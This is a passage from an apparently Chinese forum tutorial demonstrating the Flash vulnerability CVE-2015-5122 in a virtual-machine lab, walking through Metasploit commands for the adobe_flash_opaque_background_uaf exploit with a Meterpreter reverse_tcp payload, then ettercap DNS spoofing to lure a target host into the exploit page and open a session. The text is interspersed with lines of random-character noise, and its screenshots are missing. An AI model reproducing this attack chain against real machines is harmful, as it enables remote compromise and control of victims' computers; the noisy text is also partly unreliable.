|
9 p0 A% f' K* @4 e) S9 ^6 B
二、cve2015-5122漏洞实例演示虚拟机
* y5 n6 v0 P6 N! K6 C 0 a9 n" G: c! g) L
/ V/ U2 P1 J0 a1 ?1 Y7 P5 p
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 4 v+ o* y V+ S+ q, g" T: d
8 j" P0 ]: v2 [, [) X# h, S7 z! _ ~& J& u4 `0 K7 \
search cve-2015-5122如图:
9 I2 E( |1 V% c. d3 E- P" D
5 _( V. J. u& A) m2 k4 O0 b$ {) }" d t+ X$ [& `. \
/ Z& t0 P3 V) ~/ f5 w, s
1 Y% T7 j( ?7 ?6 S$ \/ u% X
& u# i- U5 Z* G0 v1 Q# C
下面我们敲如下命令:
9 r# e" M; |9 G( w2 A2 r
) |" t& ~% |" P7 P! O8 Y
; ~1 v7 t+ [+ Q" l9 A+ c use exploit/multi/browser/adobe_flash_opaque_background_uaf
! g' _9 i9 G9 w) W7 U7 k * M) R" N# ]! M% F/ E% j2 n/ f5 {
[% L9 a6 I5 H
set PAYLOAD windows/meterpreter/reverse_tcp
& y3 `" u& [9 r2 Q! m " \: N+ R0 b+ F+ t) {# X
; v% z/ G& M& i" L( L& K0 l6 x set LHOST 192.168.0.109 @* J( ]3 V: ~/ g
7 \! _7 s* _; ^+ `& }( p2 w0 e+ O
7 P8 U4 ^0 E: M4 u6 |7 c
set URIPATH / /*根目录*/ & N1 R1 e( K# m9 R% w. l# P
/ i3 i7 W$ `: L" o7 Y# R: m/ {0 D5 m% B7 G$ g( P; c" j
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
: l) ~0 ]* z% V: M1 C$ D! ]# ^ `/ z
$ Q& F4 w( l* J9 u: J: v& S v4 d: e( [3 p% b0 @; Q
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
9 j$ u5 x7 p1 R# ?: m2 e ( Y6 T) F0 p& W: Z6 Z2 |; t
/ {0 H1 N7 e9 M3 ?4 {$ z7 Z 然后show options如图: - x: k+ Z Z. V H% h& R" y
4 x$ q3 @# ]# c# H
9 }2 k$ Q1 K9 {% P
; P) z" T- l. ?+ U) D4 H- Q1 x ( d- A8 I3 b( {3 [/ u' g2 v
; |5 m; S0 M2 T' j9 {: _
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: 5 l; c- I# g/ D: q
$ W1 L$ v5 _9 f
# X# g4 U+ M, A4 z/ N' P- J( I
5 B8 x* j7 \4 b9 ^$ |' D1 u 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
4 J- ~4 `0 Q8 T, Y; k' `/ v* D ! J- C5 X: ^. f( ^; J
- a) u+ _1 ]3 B0 f* s Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
& ^: O. u- Q u$ Y7 D ; M. c' {. r! Z" @
. l8 c4 N) R4 K$ w3 R
1 [2 D' q$ h/ }4 \ j, r2 K8 E9 g7 R
; A) v" N# I: f4 y
+ [7 B* a& p: u# S, L 成功了,这时候我们断开ettercap,如图: + Z$ o8 p. H( n4 X- R* M. Z
5 S* F5 ~$ } ~( q; n# F
9 r- n; I' D: S
% H5 T) ^3 ]0 Q) w9 v 7 B+ d* b" C) L+ e8 S+ N
# O+ z9 d4 P# o
Screenshot如图:
, h6 s; T) A) Q , v# E [8 Q* m
6 n" \9 S4 G5 Z % I/ @4 |( t) \! M
2 Q( _' x$ M" o* B* a4 n2 V: i$ L' v8 O& C. E7 \4 X
& z% @8 p) E1 [9 ^ |